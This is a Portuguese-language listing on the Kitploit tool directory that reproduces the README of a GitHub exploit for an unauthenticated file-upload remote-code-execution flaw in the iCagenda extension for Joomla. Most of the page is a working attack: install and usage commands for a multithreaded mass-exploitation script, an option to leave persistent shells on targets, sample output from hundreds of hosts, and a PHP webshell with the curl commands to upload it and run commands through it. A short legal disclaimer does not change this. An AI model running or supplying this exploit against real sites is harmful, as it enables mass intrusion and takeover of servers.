Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-48939 — Exploit de RCE por upload arbitrário de arquivo sem autenticação para a extensão iCagenda do Joomla < 4.0.8 (CVSS 10.0) | Kitploit
Ferramentas/GitHubGitHub/shinthink/cve-2026-48939
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubshinthink/cve-2026-48939

CVE-2026-48939

Exploit de RCE por upload arbitrário de arquivo sem autenticação para a extensão iCagenda do Joomla < 4.0.8 (CVSS 10.0)

Ver Repositório
2há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-48939 — iCagenda Joomla RCE Exploit

Upload Arbitrário de Arquivos Sem Autenticação → Execução de Código PHP


Visão Geral

CVE-2026-48939 é uma vulnerabilidade crítica de CVSS 10.0 na extensão de calendário de eventos iCagenda para Joomla. O recurso de anexo de arquivos do formulário de registro de eventos do frontend aplica controles de acesso apenas na camada de visualização — não no controller — permitindo upload de arquivos sem autenticação e sem validação de extensão.

Os arquivos enviados são gravados diretamente na raiz da web em /images/icagenda/frontend/attachments/ e são imediatamente executáveis como PHP.

Versões Afetadas

Versão do iCagendaStatus
3.2.1 – 3.9.14Vulnerável
4.0.0 – 4.0.7Vulnerável
3.9.15 / 4.0.8+Corrigida

Mecanismo da Vulnerabilidade

Causa Raiz

O controller registration.submit processa uploads de arquivos sem aplicar a restrição de acesso "Somente Registrados" definida nas configurações do componente. Os anexos são gravados com sua extensão original, sem qualquer lista de permissões, validação de tipo MIME ou validação de conteúdo.

root@kitploit:~
View Layer   → "Registered Only" enforced (attempts to block)
Controller   → No auth check whatsoever (trivially bypassed by POST)
File Handler → No extension allowlist, no MIME check, no content scan
Destination  → Web-accessible directory → PHP executes directly

Fluxo de Ataque

root@kitploit:~
POST /index.php?option=com_icagenda&task=registration.submit
  jform[attachment] = shell.php  →  saved to /images/icagenda/frontend/attachments/

GET /images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id
  → PHP executed → RCE

Instalação

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-48939.git
cd CVE-2026-48939
pip install -r requirements.txt

Uso

root@kitploit:~
# Single target
python cve_2026_48939.py -t target.com

# Mass exploit
python cve_2026_48939.py -f targets.txt

# Persistent shell (no cleanup)
python cve_2026_48939.py -t target.com --no-cleanup

# Save results
python cve_2026_48939.py -f targets.txt -o rce.txt

Argumentos

root@kitploit:~
  -t, --target      Single target (domain or IP)
  -f, --file        Target list, one per line
  -o, --output      Save RCE results to file
  --threads         Concurrent workers (default: 25)
  --no-cleanup      Leave shells on target
  -v, --verbose     Show detailed output

Prova de Conceito

Exploração

root@kitploit:~
$ python cve_2026_48939.py -t target.com -v
root@kitploit:~
  CVE-2026-48939 — iCagenda Joomla RCE Exploit
  CVSS 10.0 | Pre-Auth | File Upload → RCE

    [+] POST registration.submit (jform[attachment]): HTTP 200
    [+] Shell: https://target.com/images/icagenda/frontend/attachments/ic_a3f2b9c1.php

  Host     : target.com
  iCagenda : YES v4.0.5
  Vuln     : YES
  RCE      : YES
  Shell    : https://target.com/images/icagenda/frontend/attachments/ic_a3f2b9c1.php
  Output   : uid=1001(www-data) gid=1001(www-data) groups=1001(www-data)
  Time     : 3.2s

Saída do Exploit em Massa

root@kitploit:~
  CVE-2026-48939 iCagenda RCE Exploit
  Targets: 500 | Threads: 25 | Cleanup: ON
  -------------------------------------------------------

  [RCE]  target-1.com     v4.0.5    3.2s
         uid=1001(www-data) gid=1001(www-data)
  [RCE]  target-2.com     v3.9.12   4.1s
         uid=33(www-data) gid=33(www-data)

  -------------------------------------------------------
  Total: 500 | iCagenda: 23 | RCE: 8
  -------------------------------------------------------

Exploração Manual

Passo 1 — Enviar webshell PHP

root@kitploit:~
cat > shell.php << 'EOF'
<?php echo "OK|".php_uname(); system($_GET["c"]); ?>
EOF

curl -sk -X POST \
  -F "title=Event" \
  -F "jform[attachment][email protected];type=application/x-php" \
  "https://target.com/index.php?option=com_icagenda&task=registration.submit"

Passo 2 — Executar comandos

root@kitploit:~
curl -sk "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?c=id"

Aviso Legal

APENAS PARA FINS EDUCACIONAIS E DE TESTES AUTORIZADOS.

Este software é destinado a profissionais de segurança que realizam testes de penetração autorizados, organizações que auditam sua própria infraestrutura e pesquisadores que estudam a exploração de vulnerabilidades.

O acesso não autorizado a sistemas de computadores é ilegal e pode violar:

  • Estados Unidos: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • Indonésia: UU ITE Pasal 30 & 46
  • União Europeia: Diretiva 2013/40/EU
  • Reino Unido: Computer Misuse Act 1990

Os autores não assumem responsabilidade pelo uso indevido.


Referências

RecursoLink
Comunicado da IONIXionix.io/threat-center/cve-2026-48939
Entrada no NVDCVE-2026-48939
Changelog do iCagendaicagenda.com/docs

Este projeto não é afiliado à iCagenda ou à Joomlic.

Baixar ferramenta